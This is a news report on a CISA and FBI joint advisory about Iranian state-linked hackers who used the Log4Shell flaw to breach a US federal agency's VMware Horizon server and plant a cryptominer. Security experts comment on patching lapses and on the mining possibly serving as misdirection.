CISA and FBI release joint advisory on Iranian threat activity.

The US Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) released a joint cybersecurity advisory yesterday on Iranian government-sponsored APT actors compromising a federal network.

Exploitation of well-known vulnerability.

CyberScoop reports that threat actors with links to the Iranian government hacked into a US government agency’s network in the beginning of this year. The hackers used the well-known Log4Shell vulnerability to infiltrate a VMware Horizon server in February and move across the network. Bleeping Computer reports that the hackers deployed a cryptocurrency miner, as well as reverse proxies on compromised servers to remain within the network.

Hunting for compromise.

Security Week reports that CISA and the FBI published indicators of compromise (IOCs) to help potentially impacted organizations find infection, with the mindset that there has already been a compromise. The agencies said in the advisory, “All organizations with affected VMware systems that did not immediately apply available patches or workarounds [should] assume compromise and initiate threat hunting activities.” If signs of compromise are found, connected systems should be investigated and privileged accounts should be audited.

Attribution to Nemesis Kitten.

While many news outlets have not attributed the attacks to a specific threat actor, the Washington Post published an independent account (reliant on anonymity) identifying the threat group as Nemesis Kitten, and the victimized agency as the US Merit Systems Protection Board. The Post quotes Bryan Ware, CEO of LookingGlass Cyber and former top CISA official, who speculates that the cryptojacking was misdirection, “It’s possible Iran used it to obfuscate other activities like espionage or mislead the incident response team — essentially spies disguising themselves as criminals.”

Added, 7:15 PM, November 17th, 2022.

Nic Finn, Threat Intelligence Consultant at GuidePoint Security, offered some context on Nemesis Kitten's track record:

"Microsoft recently released a threat profile on DEV-0270 (Nemesis Kitten) which described a potential for Nemesis Kitten actors to moonlight for personal profit. Nemesis Kitten has been observed conducting crypto-mining and ransomware attacks for quite some time in order to increase revenue for the Iranian regime. Additionally, these hackers have been observed attempting to impact the US Presidential election, with multiple indictments for attempting to influence the 2020 election by hacking into voter websites, disseminating fake videos alleging voter fraud, and threatening voters."

Update: Risks of laggard patching.

Added, 11;30 AM, November 17th, 2022.

Tim Mackey, Principal Security Strategist at Synopsys Cybersecurity Research Center, emphasizes that it's been almost a year since the Log4Shell vulnerability was identified, disclosed, and patched, and yet exploitation continues: “Addressing the log4shell vulnerability in production systems is not a new task. It has, after all, been almost a year since that vulnerability was disclosed and patches issued. If your organization can't attest to completing the task of patching for log4shell, then that implies a lack of awareness of the issue. Part of a comprehensive patch process includes an accurate accounting of the software powering the business, and any libraries it depends upon. Criminal groups know businesses are lax with their patch process, which means the software risk in unpatched software is real risk to businesses that haven't patched.”

Added, 7:15 PM, November 17th, 2022.

Nic Finn, of GuidePoint Security, observes that the incident shows a shortfall in vulnerability management practices:

"This clearly shows that organizations, even including federal agencies, are failing to maintain strong vulnerability management processes. There are over 13,000 US-based servers hosting VMWare Horizon, according to Shodan data. It is a trivial process for an actor with Nemesis Kitten's resources to attempt to exploit this vulnerability against those servers. Even a 1% vulnerability rate still indicates 130 vulnerable servers. Organizations need to establish thorough Attack Surface Monitoring processes and regularly check for vulnerable services across their servers."

Update: Why cryptojacking?

Added, 7:15 PM, November 17th, 2022.

GuidePoint Security's Nic Finn offered some observations about the cryptojacking component of Nemesis Kitten's operation:

"Nemesis Kitten has been using crypto-mining against victims for a long time. This is lucrative because they can expend manpower resources to gain access to victim networks, then collect crypto directly without the need to interact with victims for negotiations, as we see in ransomware engagements. Targeting of federal agencies isn't particularly surprising, considering the amount of government agencies and the size of their networks. CISA has noted Iran-based cyber actors targeting federal agencies since at least September 2020.What's noteworthy about CISA's publication is that these targets are VMWare Horizon servers, meaning there is the potential for significantly more resources to be expended, resulting in higher profits for Nemesis Kitten while potentially being harder to observe and impacting less hosts across a victim network."

According to Chris Gray, AVP of Security Strategy at Deepwatch, sent in some reflections on the possibilities of misdirection in a cyberattack:

"It isn't uncommon for exploited systems to be used for remote storage/processing/access. We hear about breaches for the sake of stealing data or ransomware, but using them for purposes such as this, where money can be made iteratively via a remote web of systems (similar to the SETI initiative on a "nicer" model) with little to no real risk is also a viable money maker. Low-risk (i.e., not heavily monitored or secured) targets can be exploited and used for some time. The odds are that hackers will discover these systems, and they may only need to expend a minor effort to break in. It then becomes a monetized throwaway asset that might make you $5 in the interim between exploit and detection. Why not make some cash at someone else’s cost when it only costs a few moments of effort?

"Or…. It could be a smokescreen. Easily found and exploited systems can be used as rapid infiltration and jump off points. If I leave behind an obvious, minimally harmful presence, the defending teams may simply fix that problem and move on. There may be no real effort to dig deeper. I removed the “thing.” I can go to my next problem, right? The next problem, however, may be what wasn’t found. Easy battles can sometimes make us blind to the effort needed to win the war.

"DEV-0270 ("Nemesis Kitten") is a subgroup of an Iranian actor group called Phosphorus. They are somewhat (in)famous for using legacy vulnerabilities to exploit systems. This isn't special; this kind of exploit is a significant attack vector for everyone. This case highlights this history, though, given that Log4j was and is not new. It was a thing that could have been patched but wasn’t.

"As for what Log4j even means for the cyber community, it means the same thing it always has. Know and fix your environments. We tend to heavily pursue remediation for "new" vulnerabilities on critical systems and applications. Lower-risk targets are prioritized for later fixes to catch up to the situation over time. In many vulnerability management programs, we never get to the lower prioritized objectives in light of the "new hotness." Those risks remain, often fading from our awareness over time. The vulnerabilities remain, and the weaponized tools of exploitation are available. These systems were vulnerable months after this flaw became known and were compromised when the effort was made. 

"However, we can't look at this like it was a year after Log4j came out...this hack is dated much closer to the December 2021 release. So, this successful exploit was only one of many in play. Numerous organizations were falling victim to the same flaws at the time."